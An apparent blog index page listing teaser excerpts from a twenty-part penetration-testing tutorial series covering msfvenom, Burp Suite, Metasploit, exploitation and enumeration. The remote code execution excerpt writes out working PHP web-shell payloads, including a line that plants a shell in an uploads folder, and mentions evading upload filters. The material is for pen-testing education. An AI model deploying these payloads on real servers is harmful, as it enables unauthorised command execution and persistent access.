[ Pen Testing ] :: Step by Step: msfvenom

This is post 10 of 20 in the series “[ Pen Testing ]” Msfvenom creates shellcode from within Bash. Here is Rapid7’s own excellent documentation: https://github.com/rapid7/metasploit-fraamework/wiki/How-to-use-msfvenom “Complete How to Guide for MSFvenom”: https://securitytraning.com/complete-guide-msfvenom/ And a good thorough walk-through (in Spanish, but with regular English command examples): https://www.hackplayers.com/2018/05/recopilacion-shells-en-windows.html Open Bash and enter: msfvenom to get a …

[ Pen Testing ] :: Step by Step: Remote Code Execution (RCE)

Glenn Norman hacking

This is post 9 of 20 in the series “[ Pen Testing ]” Remote Code Execution RCE PHP RCE Test a form for vulnerability to PHP RCE: <?php phpinfo(); ?> Get a remote PHP shell: <?php system($_GET[“c”]); ?> <?php `$_GET[“c”]`; ?> Upload a file: <?php file_put_contents(‘/var/www/html/uploads/test.php’, ‘<?php system($_GET[“c”]);?>’); ?> Evade file-type upload filters using rot13 …

[ Pen Testing ] :: Step by Step: Burp Suite

This is post 8 of 20 in the series “[ Pen Testing ]” Burp Suite Start with the basics: https://www.cybrary.it/s3ss10n/s3ss10n-wednesday-burp-suite-basics/ Use Burp to Test for Path Traversal Vulnerabilities https://support.portswigger.net/customer/en/portal/articles/2590663-using-burp-to-test-for-path-traversal-vulnerabilities

[ Pen Testing ] :: Step by Step: Metasploit and Armitage

Metasploit

This is post 7 of 20 in the series “[ Pen Testing ]” Metasploit and Armitage Starting Metasploit Generic Metasploit installation instructions for any OS: https://metasploit.help.rapid7.com/docs/installing-the-metasploit-framework Instructions for starting Metasploit in Kali: https://docs.kali.org/general-use/starting-metasploit-framework-in-kali The default install of Metasploit that comes with Kali needs to be initialized. service postgresql start msfdb init # only if necessary …

[ Pen Testing ] :: Step by Step: Post-Exploitation

Glenn Norman

This is post 6 of 20 in the series “[ Pen Testing ]” Post-Exploitation Now we’re in, and it’s time to expand our powers. Post-Exploitation in Windows CrackMapExec is our most excellent friend here. It’s a Windows/Active Directory exploration/exploitation tool that lets us walk their domain and machines and do whatever we damn well wanna. …

[ Pen Testing ] :: Step by Step: Exploitation

exploit-db

This is post 5 of 20 in the series “[ Pen Testing ]” Exploitation BOF (buffer overflow) Exploits Buffer overflows are pretty technical, but eventually you’ll find yourself using them. In most cases you’ll copy or create code and encode it into a shellcode exploit. Review and correct the initial pre for configurable variables. Pay …

[ Pen Testing ] :: Step by Step: Enumeration

Security Exploits

This is post 4 of 20 in the series “[ Pen Testing ]” Enumeration Okay, by now you’ve spent hours, days or weeks stealthily footprinting your scope. Since this is pen testing, you’ve been mighty careful not to exceed your scope, right? So let’s talk tools and techniques. See https://security.stackexchange.com/questions/168247/reduce-noise-when-penetration-testing for an extensive list of …